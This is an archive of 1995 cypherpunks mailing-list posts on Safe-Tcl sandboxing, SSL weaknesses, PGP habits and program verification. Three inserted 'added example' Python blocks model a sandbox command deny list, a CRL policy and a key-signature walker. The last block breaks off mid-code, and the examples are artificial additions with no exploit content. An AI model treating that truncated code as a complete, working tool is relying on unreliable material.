You mean the "dangerous" commands can't just be left out of the proper
place in the makefile or something?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 4 Aug 95 14:52:48 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
In-Reply-To: <9508042112.AA24506@sulphur.osf.org>
Message-ID: <199508042152.RAA12471@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >the interpreter is made "safe" is to take a fully working tcl interpreter
> >(with full privileges) at run time, and use TclDeleteCommand() to remove
> >offending commands. Safe-TCL is not emasculated at compile time, but at
> >run time.
> 
> I have been told by folks at Sun that they are planning on doing it at
> compile-time as well as at run-time.  One of the concerns I conveyed
> was that I want to make it easy to "pull out" the safe code and give
> it a security audit.

  SafeTcl or Java? I wish SafeTcl was isolated into a separate library
with compiled-in safety so I could embed it into my applications. As it is
now, I have to just use normal Tcl and hack in the MakeInterpreterSafe()
function which removes dangerous commands.

-Ray
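
Added example (not part of the original messages, and not Tcl or Safe-Tcl code): a small Python model of the two approaches discussed in this thread, deleting dangerous commands from a full interpreter at run time versus building the interpreter from a fixed list of safe commands. The command tables, the release names and every function name here are hypothetical.

```python
"""Run-time command deletion versus an interpreter built from an allowlist."""


def privileged(name):
    """Stand-in for a command that touches the host; it only reports it was reached."""
    def command(interp, *args):
        return "PRIVILEGED:" + name
    command.privileged = True
    return command


def cmd_set(interp, name, value=None):
    """set name ?value? : store and/or return a variable."""
    if value is not None:
        interp.vars[name] = value
    return interp.vars[name]


def cmd_incr(interp, name, amount="1"):
    """incr name ?amount? : add to an integer variable."""
    interp.vars[name] = str(int(interp.vars.get(name, "0")) + int(amount))
    return interp.vars[name]


class Interp:
    """Minimal command interpreter: first word selects the command."""

    def __init__(self, commands):
        self.commands = dict(commands)
        self.vars = {}

    def delete_command(self, name):
        self.commands.pop(name, None)

    def eval(self, line):
        words = line.split()
        if not words:
            return ""
        if words[0] not in self.commands:
            raise NameError('invalid command name "%s"' % words[0])
        return self.commands[words[0]](self, *words[1:])


# Hypothetical command tables of two releases of the full interpreter.
RELEASE_1 = {"set": cmd_set, "incr": cmd_incr, "exec": privileged("exec"),
             "open": privileged("open"), "socket": privileged("socket")}
RELEASE_2 = dict(RELEASE_1, load=privileged("load"))  # new command added later

DENYLIST = ("exec", "open", "socket")  # written when release 1 was current
ALLOWLIST = ("set", "incr")            # the audited safe subset


def safe_by_deletion(full_commands):
    """Start from the full interpreter and delete known-dangerous commands."""
    interp = Interp(full_commands)
    for name in DENYLIST:
        interp.delete_command(name)
    return interp


def safe_by_allowlist(full_commands):
    """Build the interpreter from the audited subset only."""
    return Interp({n: full_commands[n] for n in ALLOWLIST if n in full_commands})


def exposed_privileged(interp):
    """Audit helper: names of privileged commands a script can still reach."""
    return sorted(n for n, fn in interp.commands.items()
                  if getattr(fn, "privileged", False))


if __name__ == "__main__":
    print("deletion, release 1 :", exposed_privileged(safe_by_deletion(RELEASE_1)))
    print("deletion, release 2 :", exposed_privileged(safe_by_deletion(RELEASE_2)))
    print("allowlist, release 2:", exposed_privileged(safe_by_allowlist(RELEASE_2)))
```

In this model the deletion list has to track every release of the full interpreter, while the audit target of the allowlist build is the two-entry list itself.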




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 4 Aug 95 18:35:43 PDT
To: chris@deltacom.mindspring.com (Christopher Smith)
Subject: Re: Quicken's new version
In-Reply-To: <Pine.LNX.3.91.950728084231.1957A-100000@deltacom.mindspring.com>
Message-ID: <9508050133.AA13495@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain


Christopher,

> If I am out of place for posting here, forgive me; however, I do
> believe this germane.  Compass Bank here in Alabama is joining
> twenty other banks around the country to offer dial-in banking via
> Quicken's new software release.  Does anyone know or have heard of
> the security mechanisms which are to be built in to this product,
> specifically authent and encryption?

I'm Intuit's security architect, and I'd love to talk to you about
this.  Unfortunately, we'll have to wait until my boss decides to make
an architecture announcement.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 4 Aug 95 01:50:54 PDT
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <Pine.LNX.3.91.950804145626.10023E@ima.net>
Message-ID: <Pine.SOL.3.91.950804184517.4116A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Aug 1995, Enzo Michelangeli wrote:
> On Fri, 4 Aug 1995, Alex Tang wrote:
> Perry Metzger and Mark Chen have recently expressed some criticism, and
> Adam Shostack, around the end of May, posted a review that highlighted a 
> number of potential problem areas.

Do you have a copy of this?

> Personally, I especially dislike the use of RC4-40 (yes, other algorithms 
> are supported, but not using the export version of Netscape Navigator); 
Totally agree, hell, I'm going to give the option for users and server to 
specify at run time which ciphers never to use :-).

> the excessively large portion of the handshaking data exchanged as 
> cleartext; and the limitations in certificate management (no provisions 
> for verifying the revocation status with a CA).

The clear text I don't like, I agree.  But then when used for http, 
everything begins with a GET anyway.  The CRL verification is again to me 
a matter of implementation.  Currently my library does not support CRL 
(but I can load and manipulate them).  It is simply a function of the 
infrastructure to go with the library.  SSL v3 of the spec does allow for 
CRL to be passed along with the certificate hierarchy (a PKCS-7 object).

I'm mostly concerned with any objections raised with the protocol, not the 
particular implementation around right now.  With my library I fully 
intend to make it possible to refuse to authenticate the server unless a 
current CRL is present.

Anyway, I'm interested in hearing people's complaints so I can attempt to 
make sure none of the fixable problems are in my library :-)

eric

--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
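
Added example (not part of the original message and not SSLeay code): one way to express the two policies mentioned above, a run-time list of ciphers never to use and refusing to authenticate a server unless a current CRL is present. The record layout, CA names, serial numbers and dates are constructed, and CRL signature verification is assumed to have happened before these records are built.

```python
"""Fail-closed server authentication policy: banned ciphers and CRL currency."""
from datetime import datetime, timezone


def utc(year, month, day):
    return datetime(year, month, day, tzinfo=timezone.utc)


def pick_current_crl(crls, issuer, now):
    """Newest CRL from `issuer` whose validity window contains `now`, else None."""
    current = [c for c in crls
               if c["issuer"] == issuer
               and c["this_update"] <= now < c["next_update"]]
    return max(current, key=lambda c: c["this_update"], default=None)


def authenticate_server(cert, cipher, crls, now,
                        never_use=frozenset(), require_crl=True):
    """Return (accepted, reason). With require_crl=True a missing or stale
    CRL is a refusal, not a skipped check."""
    if cipher in never_use:
        return False, "cipher refused by local policy"
    crl = pick_current_crl(crls, cert["issuer"], now)
    if crl is None:
        if require_crl:
            return False, "no current CRL for issuer"
        return True, "accepted without revocation check"
    if cert["serial"] in crl["revoked"]:
        return False, "certificate revoked"
    return True, "accepted"


# Constructed sample data.
NOW = utc(1995, 8, 4)
CRLS = [
    {"issuer": "Test CA A", "this_update": utc(1995, 7, 1),
     "next_update": utc(1995, 8, 1), "revoked": set()},
    {"issuer": "Test CA A", "this_update": utc(1995, 8, 1),
     "next_update": utc(1995, 9, 1), "revoked": {1001}},
    {"issuer": "Test CA B", "this_update": utc(1995, 6, 1),
     "next_update": utc(1995, 7, 1), "revoked": set()},   # stale on NOW
]
NEVER_USE = frozenset({"RC4-40"})


def run_cases():
    """Decisions for a few constructed handshakes."""
    a_revoked = {"issuer": "Test CA A", "serial": 1001}
    a_good = {"issuer": "Test CA A", "serial": 1002}
    b_cert = {"issuer": "Test CA B", "serial": 5}
    return {
        "revoked": authenticate_server(a_revoked, "RC4-128", CRLS, NOW, NEVER_USE),
        "good": authenticate_server(a_good, "RC4-128", CRLS, NOW, NEVER_USE),
        "weak_cipher": authenticate_server(a_good, "RC4-40", CRLS, NOW, NEVER_USE),
        "stale_crl": authenticate_server(b_cert, "RC4-128", CRLS, NOW, NEVER_USE),
        "stale_crl_lenient": authenticate_server(
            b_cert, "RC4-128", CRLS, NOW, NEVER_USE, require_crl=False),
    }


if __name__ == "__main__":
    for name, (ok, reason) in run_cases().items():
        print(f"{name:18s} {'ACCEPT' if ok else 'REFUSE'}  {reason}")
```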





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Fri, 4 Aug 95 17:53:14 PDT
To: CYPHERPUNKS@toad.com
Subject: "The Net"
Message-ID: <8AE8485.00030002C7.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> logic, especially the notion that one can be "vanished" by having computer
TC> records changed--I can believe that such changes would screw things up, but
TC> surely even the character played by Sandra Bullock (nicely) would have
TC> human friends and associates to vouch for her.

  I would have thought so, too. But recently, my boss's sister-in-law
tried to get a Kansas drivers' license. She had allowed her Missouri
license to lapse before she moved, and some glitch in the MO computer
left her as a non-person. Now, in order to get the new license, she will
need a photo ID (and her expired "foreign" license doesn't cut it,
although if it were a KS license, it would.)

  The burrocraps at the DMV won't accept any "vouching" whatsoever.



 * A man's house is his hassle.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 4 Aug 95 04:31:05 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <Pine.SOL.3.91.950804184517.4116A-100000@orb>
Message-ID: <Pine.LNX.3.91.950804190117.11525A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Aug 1995, Eric Young wrote:

> Do you have a copy of this?

Yes, I've forwarded it to you separately.

> The clear text I don't like, I agree.  But then when used for http, 
> everything begins with a GET anyway.  

Well, ssh and Photuris show that a better way is possible: do a D-H key 
exchange, then handle anything else (including the authentication of the 
D-H transaction) on the newly established encrypted channel.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 4 Aug 95 11:15:43 PDT
To: cypherpunks@toad.com
Subject: PC E-cash (NewsClip)
Message-ID: <199508041815.UAA27253@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Secret Service Says Student Used PC To Print Money


Lubbock, Tex., Aug. 3 -- PC graphics programs have come a
long way since their inception, but not far enough to fool
the Secret Service. That's what a Texas Tech student tried
to do when he used his personal computer to print
counterfeit money, according to Secret Service agents. 

"He really put his whole heart and soul into it," according
to Lubbock, Texas Secret Service Resident Agent David
Freriks. 

Freriks said the man is an engineering student at Texas
Tech, but told agents he plans to change his major to
computer science. The 20-year old student hasn't been
identified by name since he hasn't been formally charged
yet, according to Freriks. But officials apparently aren't
concerned that he will flee. "At this point, he's more
afraid of his dad than anything," said one agent.

Freriks said the Pakistani national, who resides in
affluent southwest Lubbock, scanned a real $50 bill into
his PC, then printed the image to an Epson inkjet color
printer. Agents said the money looked real at a distance
but up close the designs were blurred, the coloration was
faulty, and the paper was slick and didn't have a watermark
strip.

Freriks said agents are confident that all of the
approximately $3,300 that was circulated has been recovered
except for about $1,000 which he said he is sure will show
up eventually, since the quality makes it easy for bank
employees to spot. ...

Investigators seized the home computer, printer and scanner
from the student's home. They said they also found a
suitcase containing almost $260,000 in fake $50 bills. 

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 4 Aug 95 17:51:10 PDT
To: cypherpunks@toad.com
Subject: SYN_tax
Message-ID: <199508050050.UAA07631@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-4-95. W$Japer:


   "Cyberpoliticking: Presidential Races Are Being Changed By
   Latest Technology. Internet and Other Sources Can Tailor
   Information, Sway Voters' Decisions."

      This kind of campaign foray into cyberspace is but a
      small slice of a much bigger revolution. The explosion
      of new avenues of information -- digitized,
      computerized, cabled and broadcast -- will change the
      way Americans gather the information they use in picking
      their leader next year. Campaigns are struggling to
      figure out how to cope with this static-filled world, in
      which they can use new technology in unprecedented ways
      to reach both mass audiences and ever-narrower niches of
      specific voters. For voters, the difficulty will be to
      distinguish between the information and misinformation
      inevitably mixed into the avalanche.           LYN_jrk


   "Silicon Forest: For Oregon, the Boom In High Tech Brings
   Jobs and Handwringing."

      The quest for cheap land, cheap labor and tax breaks has
      led most of the world's biggest chip makers here, more
      than $13 billion in high-tech construction is either
      under way or proposed for the 100-mile swath of rural
      landscape stretching from Portland to Eugene. But
      surprising resistance is cropping up. In May, Yamhill
      County, at the western edge of Silicon Forest, rebelled
      against Sumitomo Sitix Corp.'s demand for a $58 million
      tax break for its proposed $912 million chip plant. In
      June, several hundred people turned out to cheer
      speeches opposing plans by Hyundai Electronics America
      to build a $1.3 billion chip plant.            KIK_but


   Ev & Ad's kids: SYN_tax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 4 Aug 95 19:15:18 PDT
To: cypherpunks@toad.com
Subject: CFP - Electronic Commerce Conference
Message-ID: <v02120d00ac488486057f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>From: Ravi Kalakota <kalakota@uts.cc.utexas.edu>
>Subject: CFP - Electronic Commerce Conference
>To: www-buyinfo@allegra.att.com
>Date: Fri, 4 Aug 1995 12:44:28 -0600 (CDT)
>Cc: kalakota@uts.cc.utexas.edu
>Mime-Version: 1.0
>
>
>
>Call for Participation:
>
>    The First International Conference on Electronic Commerce
>    -->  Conference Theme: Frontiers of Electronic Commerce  <--
>
>
>We are pleased to announce The First International Conference on
>Electronic Commerce, which will be held on Monday, October 30
>and Tuesday, October 31, 1995, at The University of Texas at
>Austin's IC2 Institute in Austin, Texas. This conference is designed
>to address research issues facing academia and industry in the age of
>electronic commerce. The conference will bring together experts in
>both academia and business to identify and develop a set of critical
>issues for research in this area. The dual goals of the conference
>include shared learning on electronic commerce practices and
>defining a research agenda which will directly address issues
>concerning companies today and position them for the challenges of
>tomorrow.
>
>If you have any questions or need more information, contact: Ravi
>Kalakota (kalakota@uts.cc.utexas.edu)
>
>or see --> http://cism.bus.utexas.edu/ravi/ecomm.html
>
>We hope you are able to attend this conference.  Registration
>information, speakers list and materials are enclosed.
>
>
>Conference Summary
>-------------------------
>As the fastest growing facet of the Internet and other component
>technologies, electronic commerce offers functionality and new
>ways of doing business that no company can afford to ignore. The
>basis for moving to an electronic commerce is a belief that electronic
>markets have the potential to be more efficient in developing new
>information-based goods and services, finding global customers and
>trading partners to conduct business. Electronic commerce via the
>Internet or the next generation network infrastructure -- Information
>Superhighway -- will change business institutions, operations and
>products/services as we know today, just as the telephone, TV, fax,
>e-mail and EDI changed the way businesses and consumers
>communicate.
>
>This conference is aimed at pushing and provoking electronic
>commerce research and practice to "go where no firm has ever
>ventured before." We expect electronic commerce to obsolete much
>of the accumulated research in business. Instead of merely
>transforming the way commerce is done today from a non-electronic
>world to an electronic platform, the new way of commerce will
>create and demand radical changes in the process, product and
>promotion to better exploit the digital platform.
>
>It is no longer sufficient for electronic commerce to be viewed as a
>path-breaking technology. Electronic commerce is already playing
>a significant role in determining the strategy of today's companies
>in providing value to external and internal customers. The challenge
>facing companies is to increase the effectiveness of electronic
>commerce activities in order to achieve superior business
>performance. As successful organizations have taken a process-
>oriented view of their businesses, they will have to re-evaluate the
>role of the electronic commerce in terms of alignment with corporate
>goals.
>
>Expanded roles for electronic commerce within the business include
>activities which support other internal business processes. Questions
>such as how this activity should be carried out, how electronic
>commerce should be integrated with other organizational units, and
>how electronic commerce technology can facilitate the goals of the
>organization turn out to be complex decisions for executives making
>these investments.
>
>Likewise, electronic commerce can become a key liaison to
>customers. These electronic commerce based organizations are
>increasingly taking on activities which expand the service offerings
>of the company. A new breed of expertise -- electronic commerce
>specialists -- is bound to emerge that focuses on creating increased
>satisfaction and stronger relationships with customers.
>
>However, this emerging electronic marketplace is an unknown and
>much like the "Wild West" of the past needs to be tamed. The
>challenge is simple: using emerging technology how do we create a
>business environment or infrastructure that will ensure efficient
>electronic markets? What does it take in terms of new organization
>structures like the network structures facilitated by smart and
>wireless messaging; new electronic institutions such as brokerages
>staffed by electronic brokers or agents; new business processes
>better suited for mass customization, global sourcing and logistics;
>new financial payment mechanisms and mercantile protocols?
>
>To achieve exploration and exploitation of new frontiers, we need to
>integrate business concerns with the changing technology. This
>conference aims at providing this integration by bringing together
>leading business researchers who specialize in the various facets of
>electronic markets, namely economics, finance, marketing
>production and operations management, and technology experts in
>the industry who are creating the electronic commerce infrastructure.
>In addition, we are inviting experts who specialize in the WWW
>browsers, electronic cash, encryption, software agents, MIME-
>based messaging, EDI and structured documents.
>
>In sum, investments in electronic commerce, whether in time or
>money, typically introduce far-reaching organizational and
>technological issues. The outcome of this conference will be a better
>understanding of the shape, structure, and operation of business in
>the coming millennium.
>
>We hope you are able to attend this conference. Registration
>information and materials are enclosed.
>
>The First International Conference on Electronic Commerce
>
> Conference Sponsors
>---------------------------
>-- National Science Foundation (NSF)
>-- RGK Foundation
>-- IC2 Institute
>-- William E. Simon Graduate School of Business Administration,
>The University of Rochester
>-- Center for Information Systems Management and
>College and Graduate School of Business
>The University of Texas at Austin
>
> Who should attend
>------------------------
>* Academics in information systems, marketing, finance,
>organizational behavior, and service management concerned with the
>emerging research topics in the electronic commerce domain.
>* Software developers and managers in the electronic commerce area
>* Executives concerned with developments in banking and finance
>* Executives concerned with providing excellent customer service
>* Executives who make investments in next generation technology
>* Executives who develop internal operations support
>
>Arrangements
>----------------
>Registration
>-------------
>To register for the conference, complete and mail the enclosed
>registration form along with a check (payable to the RGK
>Foundation) for the registration fee before October 13, 1995 to the
>RGK Foundation, 1301 W. 25th Street, Suite 300, Austin Texas
>78705
>
>The registration fee is $300 for all attendees. This registration fee
>covers the banquet on Monday evening, breakfast and lunch on
>Monday and Tuesday, coffee breaks, conference materials, and
>scheduled ground transportation to and from the hotel and
>conference site.
>
>Payment must be made by check or money order payable to the
>RGK Foundation.
>
>Please complete and mail this registration form along with
>registration fee before Friday, October 13, 1995 to:
>
>Electronic Commerce Conference
>RGK Foundation
>1301 W.25th Street Suite 300
>Austin, TX 78705
>
>Phone: 512-474-9298
>Fax: 512-474-6389
>
>Accommodations
>---------------------
>We have reserved a block of rooms at the Red Lion Hotel, 0121 N.
>I-35. You are responsible for making your own hotel reservations
>and guaranteeing your room for late arrival if necessary. Please call
>the RED LION at 512-371-5200 and mention the Electronic
>Commerce Conference.
>
>List of Speakers
>-------------------
>Dr. Nathaniel Borenstein (First Virtual) -- Electronic Commerce
>
>Win Treese (Open Market) -- Challenges facing Online Commerce
>
>Dr. Clifford Neumann (ISI/USC) -- NetCash and NetCheque --
>Electronic Payments
>
>Dr. Arthur Keller (Stanford University and CommerceNet)
>              -- Smart Catalogs and Virtual Catalogs
>
>Dr. Donna Hoffman (Vanderbilt University) -- Hyper-Marketing
>
>Ravi Kalakota (University of Rochester) -- Intermediation and
>Electronic Brokerages
>
>Dr. Jean-Philippe Favreau -- ECAT -- The Government of the
>Future -- National Institute of Standards and Technology
>
>Dave Croker -- Internet EDI -- Brandenburg Consulting
>
>Dr. Preston McAfee (MIT) -- FCC Spread Spectrum Auctions using
>Game Theory
>
>Dr. Andrew Whinston and Dale Stahl (University of Texas at
>Austin) -- Pricing Internet Services
>
>Smoot Carl Mitchell and John Quarterman (Matrix Organization) --
>Internet Service Providers -- Changing Dynamics
>
>Larry Masinter (Xerox Palo Alto Research Center) -- URI, URN
>and URLs -- Implications for the Digital Libraries
>
>Dan Connolly (W3 Organization) -- The evolution of HTML --
>Implications for the Future of the World Wide Web
>
>Dr. Su Shing Chen (National Science Foundation) -- NSF and
>Electronic Commerce
>
>Dr. Jan Stallert (University of Texas at Austin) -- Supply-chain
>Management and Electronic commerce
>
>
>
>Registration Form
>---------------------
>Name (Please type)
>__________________________________________________
>                    (Prof., Dr., Mr., Ms., Mrs.)   First      Last
>
>Title:
>______________________________________________________
>
>Organization:
>______________________________________________________
>_
>
>Address:
>______________________________________________________
>
>
>______________________________________________________
>           City           State      Zip Code       Country
>
>Telephone: (_____)__________________ Work
>(_____)_____________Home
>
>Fax:       (_____)_______________    Email:
>_________________________
>
>Which days do you plan to attend?
>        Sunday, Oct.29  ______ (Reception)
>        Monday, Oct.30  ______ (Lunch)
>        Monday, Oct.30  ______ (Banquet)
>        Tuesday, Oct.31  ______ (Lunch)
>
>Registration Fee:  Before October 13, 1995 ______ $300
>                          :  After October 13, 1995    ______ $350
>(Payment must be made by check or money order payable to the
>RGK Foundation.)
>
>Please complete and mail this registration form along with
>registration fee before Friday, October 13, 1993 to:
>
>Electronic Commerce Conference
>RGK Foundation
>1301 W.25th Street Suite 300
>Austin, TX 78705
>
>Phone: 512-474-9298
>Fax:   512-474-6389
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Fri, 4 Aug 95 21:03:25 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: There's a hole in your crypto...
In-Reply-To: <199508031709.NAA29005@colon.cis.ohio-state.edu>
Message-ID: <Pine.3.89.9508042253.A3820-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 3 Aug 1995, Nathan Loofbourrow wrote:

> Nathan Zook writes:
>  > > And is there any way to build trusted system out of small, verifiable
>  > > pieces?  Since the way they're connected could also be questioned, I
>  > > suspect that when you put enough of them together it's just as bad as
>  > > the case of a single, monolithic program.  But this isn't my area, so
>  > > I don't know.
>  > 
>  > No.  This was essentially proved during the first third of this century.
> 
> Well, I haven't gotten a reply from Nathan Zook on this assertion, so
> can anyone else back it up with some references? Perhaps we're
> discussing different contexts, but proving correct systems composed of
> correct components is still a subject of active research.
> 
> nathan
> 

Sorry about that.  Your message must have died when I splatted the dear 
"Professor" (bow, bow, bow).

There is "active research".  Why is a mystery to me.  Gödel's proof was 
the completion of several works.  One of the early ones demonstrated that no 
axiom system can be demonstrated to be consistent by a weaker one.  Now the 
"research" in this area has consisted, in part, of translating 
algorithms into statements in axiomatic systems.  The problem is that 
either we cannot prove that these systems are consistent or they are 
extremely limited in what they can do.  (In particular, recursion seems 
to be anathema.)  But the word proof in the previous sentence has to be 
taken with a grain of salt, because any axiom system that we use to prove 
things about another axiom system has to be at least as complicated.

This is why the "not a Turing machine" assertion that the "Professor" made is 
important.  We know that a Turing machine is undecidable, so if we want to 
limit behavior, we can't have one.  BUT---we don't know that being a 
Turing machine is equivalent to having "unpredictable" behavior.  
Furthermore, a "proof" of the "not a Turing machine" assertion is going 
to have to be done by--you guessed it--a computer.  And this computer is 
running a program which definitely IS a Turing machine, if it is capable 
of "proving" that other (suitably non-trivial) programs are not Turing 
machines.

Why must this be done on a computer?  Because the program under 
consideration is thousands of machine instructions long.  And each 
instruction will be translated into dozens of statements in the axiom 
system.  So any attempted proof will be beyond human ability.

Note that the above arguments do not require the physical existence of 
computers to make, which is why I referred to the "first third of this 
century", when these ideas were discovered.  In reality, the fact that 
the program itself has been compiled (or was it written in machine 
code?), that it uses an operating system (or does it address all of 
the hardware independently of other programs?), and runs on a processor 
(maybe an 80586?) should be enough to convince serious critics of the 
futility of the exercise.


But the nagging question remains:  Why can't we build up big blocks from 
little ones?  While there is a sort of "Turing horizon" beyond which 
programs are known to be unpredictable, let me attempt to address the 
problem another way, to redefine our intuition to be more in touch with 
reality.

The situation we are dealing with amounts to the phenomenon of 
"spontaneous complexity".  First, some physical examples.  Take an object 
moving in a Newtonian space, with nothing else there.  Give initial 
conditions, tell me what happens next.  No problem.  Take two objects.  
No problem.  Take three objects.  Big problem.  Why?  Perhaps we just 
haven't figured out the mathematics yet.  Okay, take five objects.  Why 
five?  Because it is known that with a particular initial condition for 
five objects, all objects will "leave the universe" in a finite amount of 
time (!!!!!).  Now what if you bump them a little bit?  Certainly not all 
combinations of initial conditions lead to this situation.  Which is 
which?  Can this behavior be "built up" from two-object situations? 

It is important to note that this type of complexity was in fact 
discovered by Poincaré and others shortly after the turn of the 
century.  Some of his sketches clearly are forerunners of the Mandelbrot 
set--he was considering these types of ideas.  (The complexity issues 
lost out first to relativity and then to quantum mechanics in the 
competition for the minds of researchers.)

Then there is the Mandelbrot set--which points are in and which are out?  
Are you sure?  (Go ahead and limit yourself to rational points--we are 
talking computers.)

Take S^1, the unit circle in the Complex plane.  Define a series of 
functions f_1, f_2... on S^1 as follows:  f_i(z) = z^i.  Each point with 
rational multiple of pi argument will limit to one, but no irrational 
points will.  What is important to note is that there is a uniform 
set of measure 0 on S^1 such that the behavior in the limit of this set is 
completely unpredicted by the behavior of the rest of the set.  Perhaps 
you prefer to map S^1 to S^1 by repeated applications of f_2?  Then only the 
binary rationals settle down. 

So in each case, complex (in the technical sense) behavior is exhibited 
by outlandishly simple systems.  Somehow the _interactions_ of these simple 
and predictable systems become unpredictable.


That is why I consider this to be a closed subject.

Nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 4 Aug 95 20:09:16 PDT
To: rsalz@osf.org
Subject: Re: Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
Message-ID: <9508050307.AA24965@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for not being clear:  when I talked about compile-time safety, I
was referring to safe-tcl.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 4 Aug 95 23:45:17 PDT
To: remailer@spook.alias.net
Subject: fnords
Message-ID: <199508050641.XAA01362@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


:: 
Request-Remailing-To: wilcoxb@nag.cs.colorado.edu
Subject: Why I don't sign all my mail
Latent-Time: +0:00
Cutmarks: #--

-----BEGIN PGP SIGNED MESSAGE-----

Bryce - you write:
> Thanks for the info, Bill.  I have a question:  why are you
> sending e-mail in the clear and without authentication?
> I don't expect that anyone would want to forge mail from you
> to me, but I would be pleased if I could be a little more 
> certain of those things, and besides "Think of it as a form of
> solidarity."

Convenience, mostly.  Encryption and signature are semi-different issues.
If I clear-sign something, and you don't want to check it, it doesn't cause
you any trouble, but for most people,
getting mail that's encrypted takes extra work, especially
if they're following proper security procedures for their
PGP implementations (not running it on insecure systems, 
not leaving passphrases in cleartext for autosigners, etc.)
Think of proper security as "solidarity with people who need
real security" :-).  (Yeah, I also run PGP on insecure systems,
mainly for signature-checking, but I do use separate keys that
have words like "insecure" in the userid strings.)

The big issues are convenient interfaces with my email system.
Private Idaho's gotten good enough that if I want to send
encrypted/signed/etc. email, I can grab the mail I want to send
into the clipboard (or compose it inside PI), add headers
for who to send it to, pull down a couple menu items,
and it pops into PGP; when it's done, another menu choice
dumps the completed message back into Eudora, and the next version can send
it out directly if I prefer.  On the other hand,
moving mail _from_ Eudora _to_ PI is still a couple actions
(separate cut/pastes for the body, address, and Subject:),
so I don't usually bother.

The other convenience problem is key-handling for people whose
keys I don't already have.  PGP is too slow on a PC to haul
the entire keyserver database into my pubkey files.  
So either I have to send email to a key-server (non-real time,
especially since I do most of my email off-line), or use finger.

Unfortunately, your key wasn't on the keyservers, and I don't
have a decent PC finger client now that I'm using Trumpet Winsock
instead of Netcruiser (the finger client I use doesn't allow
cut&paste to the clipboard, screen-grabs didn't get me text,
and I did eventually get most of your key information by doing
several "telnet you@machine 79"s until one of them got the
data before the session closed :-)  Ugly...

And then there's the key validation problem - your key isn't 
signed by anyone except yourself (yeah, ok, mine's only got
signatures from previous keys of mine, which have signatures
from expired keys from the people who signed mine :-)
So my signature isn't as meaningful as it could be,
since you probably can't validate it, and I can't guarantee having a valid
public key for you to send you anything important.

So I guess I need to go get my keys signed by a couple people,
and so do you, and the next code project on my wait-until-3.0 list should
probably be a recursive key-signature digger...

Meanwhile, Private Idaho is at ftp.eskimo.com/u/j/joelm/,
and it's now working with ViaCrypt-for-Windows as well as
PGP 2.6.* for DOS.
                            Thanks;  Bill Stewart
                            stewarts@ix.netcom.com


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQBVAwUBMCMPB/thU5e7emAFAQFYPAH7BXuxp0BCWKg8v/Uv6QzUQKSix3Zff3Kw
FzBeSgDNN9KrOHEaUmemDXcBmcRabyeZyxrFTcgypvwADai1SYA45w==
=Ht4c
-----END PGP SIGNATURE-----
#--

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/
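
[Added example, not part of Bill Stewart's message or of PGP: a minimal "recursive key-signature digger" for the key-validation problem he describes, walking signer links back from a target key until it reaches a key the verifier already trusts. The key ids, user ids, dates and signature list are constructed, and the model is simplified: it assumes every usable signer is a trusted introducer and does not verify the signatures cryptographically.]

```python
"""Constructed web-of-trust walk: find a certification chain to a key."""
from collections import deque
from datetime import date

# Constructed keyring: key id -> (user id, expiry date or None for no expiry).
KEYS = {
    "ME":     ("the verifier's own key", None),
    "ALICE":  ("alice@example.org", None),
    "CAROL":  ("carol@example.org", date(1994, 12, 31)),  # expired by Aug 1995
    "BILL93": ("bill, previous key", None),
    "BILL95": ("bill, current key", None),
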